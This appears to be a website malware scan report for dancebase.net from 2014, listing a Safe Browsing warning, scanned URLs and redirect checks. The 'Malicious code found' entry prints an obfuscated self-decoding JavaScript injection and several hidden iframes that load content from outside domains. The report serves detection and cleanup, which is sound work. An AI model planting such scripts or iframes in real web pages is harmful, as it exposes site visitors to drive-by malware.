Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dancebase.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dancebase.net/ | 200 OK Content-Length: 22038 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.773.at var a='';var b='fcp7/v73i5g%e%%%Cstweonn02e2a33m%22w/ov3%D0%fr2rmDA.jkh%h2%%r0/ a333otpit2t2o2CEirt.wxi%w2i5mDEe%2/tca%232D0e2f 30hwnhbF2%h2r%%ar%%7fe.Dd%h2b233e%/allp2%%32d%i ';var c='2715084396';for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i);document.writeln(unescape(a)); Decoded script: var a='';var b='fcpah7zh6c2%%32d%i irttt4ipDe%h2%%r0/ r%%rr./p8t232D0e2f e%/w4xrF2D02e2a33m 30hed7.e%iud%h2b233%2/o5tai6tw2i5mDEe mDA-eif3%32%h2r%%a %22rr6hmddri5g%e%%%a33tesi%3%%D0%fr2r Csts-5b.3ret2t2o2CE';var c='7491028635';for(var i=0;i<19;i++)for(var j=0;j<10;j++)a+=b.charAt((parseInt(c.charAt(j))*19)+i);document.writeln(unescape(a)); var a='';var b='fcpah7zh6c2%%32d%i irttt4ipDe%h2%%r0/ r%%rr./p8t232D0e2f e%/w4xrF2D02e2a33m 30hed7.e%iud%h2b233%2/o5tai6tw2i5mDEe mDA-eif3%32%h2r%%a %22rr6hmddri5g%e%%%a33tesi%3%%D0%fr2r Csts-5b.3ret2t2o2CE';var c='7491028635';for(var i=0;i<19;i++)for(var j=0;j<10;j++)a+=b.charAt((parseInt(c.charAt(j))*19)+i);document.writeln(unescape(a)); <iframe src="http://restart-word-three4567547.sixth.biz/iframe.php?id=683&direct=true" width="5" height="5" frameborder="0"></iframe> Hidden iFrame found. size: 1x1 src: http://newsus.www1.biz/vse <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://newsus.www1.biz/vse"> Hidden iFrame found. size: 1x1 src: http://banner01.www1.biz/vse <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://banner01.www1.biz/vse"> Hidden iFrame found. style: hidden src: http://websolutionspk.com/referer2.php?id={33aa7c0d-60f9-4298-8e17-f957ae0ded64} <iframe style="visibility: hidden; display: none; display: none;" src="http://websolutionspk.com/referer2.php?id={33aa7c0d-60f9-4298-8e17-f957ae0ded64}"> | ||
http://howhigh.xz.lt/pub/counter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:30 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.dizaineriai.lt/ | 200 OK Content-Length: 11466 Content-Type: text/html | clean |
http://www.dizaineriai.lt/dizainas.html | 200 OK Content-Length: 7276 Content-Type: text/html | clean |
http://www.dizaineriai.lt/domenai.html | 200 OK Content-Length: 4925 Content-Type: text/html | clean |
http://www.dizaineriai.lt//www.iv.lt/statistika.php?type=domain_prices/ | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Jun 2014 23:20:31 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dizaineriai.lt/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Jun 2014 23:20:31 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dizaineriai.lt/talpinimas.html | 200 OK Content-Length: 5830 Content-Type: text/html | clean |
http://www.dizaineriai.lt/filtras.html | 200 OK Content-Length: 6400 Content-Type: text/html | clean |
http://www.dizaineriai.lt/profesionalus.html | 200 OK Content-Length: 5686 Content-Type: text/html | clean |
http://www.dizaineriai.lt/dedikuoti.html | 200 OK Content-Length: 6666 Content-Type: text/html | clean |
http://www.dizaineriai.lt/sertifikatai.html | 200 OK Content-Length: 6283 Content-Type: text/html | clean |
http://www.dizaineriai.lt/valdikliai.html | 200 OK Content-Length: 3881 Content-Type: text/html | clean |
http://www.dizaineriai.lt/demo/mini/ | HTTP/1.1 200 OK Connection: close Date: Wed, 04 Jun 2014 23:20:31 GMT Accept-Ranges: bytes ETag: "2343fb9-160-4ec8bad4e3cd2" Server: Apache Vary: Accept-Encoding Content-Length: 352 Content-Type: text/html Last-Modified: Mon, 02 Dec 2013 11:42:39 GMT | clean |
http://sb.dizaineriai.lt/admin/create-demo-login?reseller=internetovizija&productsetup=le20-b&locale=lt_lt | 400 Bad Request Content-Length: 90 Content-Type: text/plain | clean |
http://www.dizaineriai.lt/demo/ | HTTP/1.1 200 OK Connection: close Date: Wed, 04 Jun 2014 23:20:31 GMT Accept-Ranges: bytes ETag: "2340460-15c-4ec8bad4c21c1" Server: Apache Vary: Accept-Encoding Content-Length: 348 Content-Type: text/html Last-Modified: Mon, 02 Dec 2013 11:42:38 GMT | clean |
http://sb.dizaineriai.lt/admin/create-demo-login?reseller=internetovizija&productsetup=fv-b&locale=lt_lt | 400 Bad Request Content-Length: 90 Content-Type: text/plain | clean |
http://www.dizaineriai.lt/akcija.html | 200 OK Content-Length: 4286 Content-Type: text/html | clean |
http://www.dizaineriai.lt/pirkti.php | 200 OK Content-Length: 4956 Content-Type: text/html | clean |
http://howhigh.xz.lt/pub/domenai.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:32 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/talpinimas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:32 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/dizainas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:32 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php?planas=mini | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:32 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php?planas=premium | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 23:20:32 GMT Location: http://www.dizaineriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://actchaya.com/test/is.js | 404 Not Found Content-Length: 469 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dancebase.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 23:20:29 GMT
Accept-Ranges: bytes
ETag: "2a24713-5616-4ba9a62c40dd6"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 22038
Content-Type: text/html
Last-Modified: Tue, 06 Mar 2012 22:15:51 GMT
...22038 bytes of data.
GET / HTTP/1.1
Host: dancebase.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 23:20:29 GMT
Accept-Ranges: bytes
ETag: "2a24713-5616-4ba9a62c40dd6"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 22038
Content-Type: text/html
Last-Modified: Tue, 06 Mar 2012 22:15:51 GMT
...22038 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dancebase.net
Referer: http://www.google.com/search?q=dancebase.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dancebase.net
Referer: http://www.google.com/search?q=dancebase.net
Result:
The result is similar to the first query. There are no suspicious redirects found.